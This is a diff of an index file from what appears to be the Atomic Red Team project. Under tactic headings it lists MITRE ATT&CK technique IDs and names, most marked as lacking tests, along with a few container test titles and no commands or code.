+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.004 Indicator Removal on Host: File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1221 Template Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.002 Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.002 SyncAppvPublishingServer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.007 Obfuscated Files or Information: Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1220 XSL Script Processing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.001 Hide Artifacts: Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.004 Hide Artifacts: NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # privilege-escalation
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [containers]
-  - Atomic Test #2: CreateCronjob [containers]
-- T1098.006 Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1611 Escape to Host](../../T1611/T1611.md)
   - Atomic Test #1: Deploy container using nsenter container escape [containers]
   - Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1543.005 Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# initial-access
-- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # execution
-- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [containers]
-  - Atomic Test #2: CreateCronjob [containers]
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1047 Windows Management Instrumentation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.002 Inter-Process Communication: Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1610 Deploy a container](../../T1610/T1610.md)
-  - Atomic Test #1: Deploy Docker container [containers]
-- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
-  - Atomic Test #1: ExecIntoContainer [containers]
-  - Atomic Test #2: Docker Exec Into Container [containers]
+- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.003 User Execution: Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.003 Command and Scripting Interpreter: Windows Command Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
-# defense-evasion
-- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1610 Deploy a container](../../T1610/T1610.md)
-  - Atomic Test #1: Deploy Docker container [containers]
+# persistence
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1612 Build Image on Host](../../T1612/T1612.md)
-  - Atomic Test #1: Build Image On Host [containers]
-- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1554 Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
